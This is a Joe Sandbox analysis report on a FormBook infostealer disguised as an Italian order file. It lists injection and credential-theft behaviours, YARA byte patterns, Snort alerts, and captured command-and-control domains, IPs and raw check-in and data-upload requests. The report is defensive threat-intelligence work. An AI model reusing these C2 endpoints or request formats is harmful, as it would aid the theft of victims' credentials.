Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Requisito ordine n. 230210.exe

Overview

General Information

Sample Name:Requisito ordine n. 230210.exe
Analysis ID:803902
MD5:39f9f9780aff067b147b7adffb960c05
SHA1:30a987113262a366112c8cb91136535abba1b973
SHA256:478bd9421ff11177d8974922f1eec334f1af15845054ce1dbc42b1c9bbd4a484
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Requisito ordine n. 230210.exe (PID: 5816 cmdline: C:\Users\user\Desktop\Requisito ordine n. 230210.exe MD5: 39F9F9780AFF067B147B7ADFFB960C05)
    • CasPol.exe (PID: 5932 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 4996 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
    • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        1.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20e63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcbb2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        1.2.CasPol.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19e68:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19904:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19f6a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a0e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc77d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18b4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fc0a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20bbd:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.CasPol.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.CasPol.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbdb2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.3148.251.13.12649692802031453 02/10/23-12:45:28.335977
          SID:2031453
          Source Port:49692
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.38.8.8.861626532023883 02/10/23-12:45:54.046998
          SID:2023883
          Source Port:61626
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic
          Timestamp:192.168.2.381.17.18.19849683802031453 02/10/23-12:44:55.405933
          SID:2031453
          Source Port:49683
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.381.17.18.19849683802031412 02/10/23-12:44:55.405933
          SID:2031412
          Source Port:49683
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3148.251.13.12649692802031449 02/10/23-12:45:28.335977
          SID:2031449
          Source Port:49692
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.381.17.18.19849683802031449 02/10/23-12:44:55.405933
          SID:2031449
          Source Port:49683
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3148.251.13.12649692802031412 02/10/23-12:45:28.335977
          SID:2031412
          Source Port:49692
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Requisito ordine n. 230210.exeReversingLabs: Detection: 17%
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.frogair.onlineAvira URL Cloud: Label: malware
          Source: http://www.frogair.online/vqh7/?u1ua=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYNfYE0qlHbGzJw==&4sHXq=qmMaHdA-N1MFAvira URL Cloud: Label: malware
          Source: http://www.frogair.online/vqh7/Avira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: Requisito ordine n. 230210.exeJoe Sandbox ML: detected
          Source: 1.2.CasPol.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Requisito ordine n. 230210.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\FUCKYOU.pdbBSJB source: Requisito ordine n. 230210.exe, 00000000.00000002.269739966.0000022275420000.00000004.08000000.00040000.00000000.sdmp, Requisito ordine n. 230210.exe, 00000000.00000002.265960363.000002220001D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: caspol.pdbdv source: explorer.exe, 00000002.00000002.537406866.0000000015163000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000003543000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.521972802.0000000000612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000001.00000003.267869685.0000000001469000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.265699663.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.312421979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.313932264.0000000003000000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: caspol.pdb source: explorer.exe, 00000002.00000002.537406866.0000000015163000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000003543000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.521972802.0000000000612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\FUCKYOU.pdb source: Requisito ordine n. 230210.exe, 00000000.00000002.269739966.0000022275420000.00000004.08000000.00040000.00000000.sdmp, Requisito ordine n. 230210.exe, 00000000.00000002.265960363.000002220001D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000001.00000003.267869685.0000000001469000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.265699663.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.312421979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.313932264.0000000003000000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: CasPol.exe, 00000001.00000002.313724711.0000000003210000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: CasPol.exe, 00000001.00000002.313724711.0000000003210000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: NNbBbB.pdb source: Requisito ordine n. 230210.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C331F0 FindFirstFileW,FindNextFileW,FindClose,11_2_02C331F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C331E9 FindFirstFileW,FindNextFileW,FindClose,11_2_02C331E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi11_2_02C28D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi11_2_02C24DB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi11_2_02C28D6F

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 148.251.13.126 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.158 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.treebarktees.com
          Source: C:\Windows\explorer.exeDomain query: www.hotelyeah.top
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.198 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.jewelryimpact.com
          Source: C:\Windows\explorer.exeDomain query: www.frogair.online
          Source: C:\Windows\explorer.exeDomain query: www.krankenzusatz.net
          Source: C:\Windows\explorer.exeDomain query: www.specigain.online
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.22.198 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.117 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tobinrasheedja.cyou
          Source: C:\Windows\explorer.exeDomain query: www.gachthe365.site
          Source: C:\Windows\explorer.exeDomain query: www.nativealternatives.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.191.208.50 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 75.102.22.168 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.verde-amar.info
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49683 -> 81.17.18.198:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49683 -> 81.17.18.198:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49683 -> 81.17.18.198:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49692 -> 148.251.13.126:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49692 -> 148.251.13.126:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49692 -> 148.251.13.126:80
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:61626 -> 8.8.8.8:53
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeGC89HM0oMMSxg==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.jewelryimpact.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmrZxModizUJoJg==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.specigain.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=avntfzZWwL7S+bFx7xC7yR8pR0BqdKNL+mi6NO8or2/YUjOFXpJJhQb6NE3o2hVXLy/LWl7MJMKHcu5A7Cd4caz4W6nJ0FH5Jw==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.treebarktees.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XyI7IXI3QKaXMg==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.gachthe365.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYNfYE0qlHbGzJw==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+U/tSn+rF9O8jw==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.krankenzusatz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcTKrDMHQPN2qJA==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.hotelyeah.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 91.195.240.117 91.195.240.117
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.specigain.onlineConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.specigain.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.specigain.online/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 31 75 61 3d 67 33 42 74 5a 34 56 76 30 4a 31 36 31 79 6e 48 73 72 56 6f 32 46 4e 78 4a 55 30 4a 7e 67 30 4c 4e 6f 67 6a 4b 4b 79 7a 47 33 6f 71 35 42 53 47 34 39 75 69 4c 6e 7e 50 45 63 79 68 7a 38 63 4d 52 38 6c 6f 44 41 45 6a 77 71 30 4e 71 36 77 72 4f 45 65 44 73 62 49 4f 4e 4a 78 6c 77 30 56 4b 4f 71 51 5f 4e 41 33 30 50 54 78 73 54 54 46 4e 79 53 48 7a 51 51 64 5f 68 4a 56 5f 65 63 50 31 47 56 65 63 77 35 47 6d 61 70 37 5f 65 56 63 74 49 58 34 4f 70 30 6f 49 71 6a 39 61 64 62 71 6b 56 46 59 52 6e 38 51 57 49 4d 69 6c 69 71 47 71 58 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: u1ua=g3BtZ4Vv0J161ynHsrVo2FNxJU0J~g0LNogjKKyzG3oq5BSG49uiLn~PEcyhz8cMR8loDAEjwq0Nq6wrOEeDsbIONJxlw0VKOqQ_NA30PTxsTTFNySHzQQd_hJV_ecP1GVecw5Gmap7_eVctIX4Op0oIqj9adbqkVFYRn8QWIMiliqGqXg).
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.specigain.onlineConnection: closeContent-Length: 5334Cache-Control: no-cacheOrigin: http://www.specigain.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.specigain.online/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 31 75 61 3d 67 33 42 74 5a 34 56 76 30 4a 31 36 30 53 58 48 71 36 56 6f 7e 46 4e 79 4d 55 30 4a 70 77 30 50 4e 6f 38 6a 4b 4c 6d 6a 47 6c 45 71 36 53 71 47 35 5a 4f 69 4e 6e 7e 50 56 38 79 74 39 63 64 4e 52 34 4d 45 44 46 35 59 77 6f 59 4e 72 6f 49 72 49 6b 65 45 67 62 49 54 42 70 78 6d 75 45 56 4b 4f 71 4e 63 4e 46 4b 42 50 58 31 73 54 6c 52 4e 79 51 66 77 42 51 64 38 38 35 56 5f 65 63 7a 36 47 56 65 71 77 35 66 74 61 6f 62 5f 66 48 45 74 4b 47 34 4e 74 6b 70 4f 30 7a 38 46 4d 62 58 59 56 6e 30 52 71 75 73 4f 44 5a 6a 41 75 4c 37 77 4c 64 67 5a 6e 44 33 79 59 75 41 74 39 48 47 67 72 37 69 49 46 52 7e 6e 59 37 6f 6a 4b 46 42 39 43 70 58 70 52 61 33 78 75 59 53 39 34 5a 4e 41 31 73 30 72 6e 52 73 74 67 53 43 6a 79 6a 52 55 43 5f 4f 70 30 72 4d 5a 56 67 46 56 59 2d 46 78 76 69 34 67 65 59 57 39 6c 30 4e 70 75 5f 41 35 4d 35 48 4d 6b 56 6b 62 48 78 4d 48 64 57 69 54 50 38 75 39 37 76 58 41 76 49 4d 51 69 49 54 61 58 61 45 2d 76 79 69 33 38 4c 34 47 4e 57 6a 45 78 41 56 54 64 64 33 79 71 73 66 31 45 52 78 50 62 6f 49 41 56 71 6b 59 4c 70 4a 56 32 32 68 77 45 73 77 73 45 50 38 77 72 4a 7e 58 38 69 6e 45 6e 73 69 69 64 6a 41 53 6d 68 59 58 35 51 55 43 51 48 43 38 45 48 47 53 59 5a 59 51 49 4b 6e 58 33 65 6c 61 59 42 68 50 41 67 73 6a 32 5f 4c 4a 5a 4d 31 72 52 62 34 4e 31 55 42 70 4f 47 65 58 59 62 46 51 41 4f 76 47 46 61 46 33 51 39 38 38 46 32 33 6c 6f 58 71 38 6c 41 4d 6a 44 42 64 53 73 44 67 6c 35 41 63 64 74 4f 7e 38 32 48 69 48 51 4e 6b 4c 53 47 73 56 53 33 65 53 64 68 53 4c 66 49 4e 36 68 6b 36 38 56 43 33 4b 6d 58 6a 5f 65 5f 70 36 39 47 30 2d 57 61 71 66 38 69 67 48 6c 47 62 38 28 71 31 6a 79 4d 55 4a 6e 44 4a 63 49 5a 62 70 4b 30 73 73 51 54 41 79 32 54 67 67 67 61 63 5a 71 4d 56 6f 51 6e 65 6c 49 64 57 42 35 44 77 6f 68 75 64 7a 5a 55 7a 79 7a 45 43 63 67 74 47 39 58 37 33 57 42 67 52 53 30 5a 67 42 45 41 71 6a 4c 5f 36 30 39 6a 71 75 51 48 6c 4a 73 31 45 58 6a 6e 7a 72 76 4c 79 6f 59 43 35 70 53 41 68 77 33 61 58 6c 33 68 74 57 28 42 34 45 4a 67 6b 31 61 41 45 73 6f 78 6e 6b 6a 6b 58 47 6f 61 48 41 31 52 4b 47 46 72 4f 46 38 48 32 65 38 6e 45 37 7e 46 47 61 42 54 58 4c 28 5a 56 4b 31 58 54 54 58 6d 79 39 42 51 41 6c 34 69 4c 4c 7e 55 73 65 67 42 44 71 58 41 67 68 62 2d 56 2d 43 4d 63 55 47 46 56 33 30 48 4b 6b 70 56 51 78 65 47 61 55 77 7a 47 42 34 4b 44 56 75 6a 50 7a 4f 79 45 79 41 42 6e 78 77 65 6a 45 58 39 54 6b 75 45 44 41 72 6f 33 2d 6f 76 63 5f 48 50 72 55 78 64 56 36 6d 57 58 41 50 47 4c 71 72 39 73 2d 4e 43 69 79 52 43 52 6c 44 78 43 57 73 74 75 42 64 59 77 52 42 46 6b 6e 41 49 77 6a 76 39 46 48 6e 5a 5a 56 58 76 56 76 75 3
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.treebarktees.comConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.treebarktees.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.treebarktees.com/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 31 75 61 3d 58 74 50 4e 63 45 49 6e 7e 62 62 56 31 66 74 61 6d 51 36 59 36 78 6f 6f 56 6d 30 71 65 4e 41 5f 6f 48 79 48 4f 59 67 4a 6a 7a 6e 45 46 69 76 4f 59 61 46 4b 6e 6a 47 37 46 6d 4c 70 70 53 67 50 4e 79 69 50 42 6e 33 57 50 62 6d 43 47 4a 63 34 67 68 46 6c 64 71 71 45 42 2d 37 65 78 57 6e 33 49 34 67 78 77 76 41 34 39 75 47 4d 72 59 65 6c 28 67 54 69 4d 57 79 43 50 63 79 62 36 6d 76 76 36 79 5a 37 4a 31 42 37 64 4b 61 71 45 70 41 2d 28 30 61 4a 30 4b 4f 70 69 36 35 78 28 37 72 38 62 64 36 76 6b 4c 57 34 48 6b 69 6f 33 77 64 55 28 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: u1ua=XtPNcEIn~bbV1ftamQ6Y6xooVm0qeNA_oHyHOYgJjznEFivOYaFKnjG7FmLppSgPNyiPBn3WPbmCGJc4ghFldqqEB-7exWn3I4gxwvA49uGMrYel(gTiMWyCPcyb6mvv6yZ7J1B7dKaqEpA-(0aJ0KOpi65x(7r8bd6vkLW4Hkio3wdU(Q).
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.treebarktees.comConnection: closeContent-Length: 5334Cache-Control: no-cacheOrigin: http://www.treebarktees.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.treebarktees.com/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 31 75 61 3d 58 74 50 4e 63 45 49 6e 7e 62 62 56 30 37 52 61 6b 78 36 59 34 52 6f 76 5a 47 30 71 58 74 41 6a 6f 48 7e 48 4f 5a 30 5a 6a 42 4c 45 43 31 6a 4f 59 34 74 4b 6c 6a 47 37 44 6d 4c 74 30 43 67 5a 4e 79 32 70 42 6c 76 47 50 64 7e 43 55 73 51 34 6d 42 46 6d 56 71 71 46 52 75 37 64 28 32 6e 33 49 34 73 58 77 74 70 46 39 74 57 4d 71 75 43 6c 28 6d 48 68 4b 47 79 44 47 38 79 62 36 6d 6a 4a 36 79 5a 72 4a 31 59 6a 64 4a 43 71 45 5f 73 2d 73 31 61 57 7a 61 4f 55 74 71 34 74 35 70 4f 6f 56 50 36 62 6f 4c 61 36 49 69 79 39 30 51 41 65 39 54 62 41 44 43 46 6d 65 4d 6a 4d 67 6b 37 6e 71 4f 39 76 73 36 28 6e 44 63 43 5f 70 56 58 76 4f 6f 7e 62 63 68 34 39 75 31 57 4f 57 4a 53 58 7a 69 6b 75 4d 70 58 33 62 54 75 77 47 68 53 62 79 78 4e 48 50 79 4a 6b 65 44 56 53 39 7a 6d 74 69 42 70 32 75 34 32 44 4d 37 78 47 67 48 49 51 33 7a 32 66 61 53 74 69 4c 53 63 59 71 57 6b 6f 5a 65 7e 47 6c 34 58 37 47 73 4a 49 31 52 61 79 7e 77 42 69 6b 52 46 71 4c 42 7e 6a 6a 58 79 7a 4f 63 76 30 30 6b 4b 56 4f 77 52 47 42 6f 35 56 72 54 30 55 39 4f 54 77 6f 6a 6c 44 6b 2d 52 41 55 31 55 2d 4a 4e 42 50 72 64 45 46 4f 5a 6c 5f 5a 4b 57 74 42 79 46 33 54 54 42 43 71 70 68 57 64 67 6e 6f 49 79 59 42 79 62 64 56 7a 78 58 35 28 71 6d 77 76 4a 59 70 52 49 53 73 35 46 4d 68 38 57 54 47 53 42 62 52 34 6a 37 6d 52 54 79 33 4e 64 6b 4f 49 39 4f 5f 59 32 5a 63 69 51 63 7a 47 39 31 32 55 79 65 73 50 55 50 74 34 67 37 6b 71 5f 65 2d 4f 31 73 47 76 79 58 6e 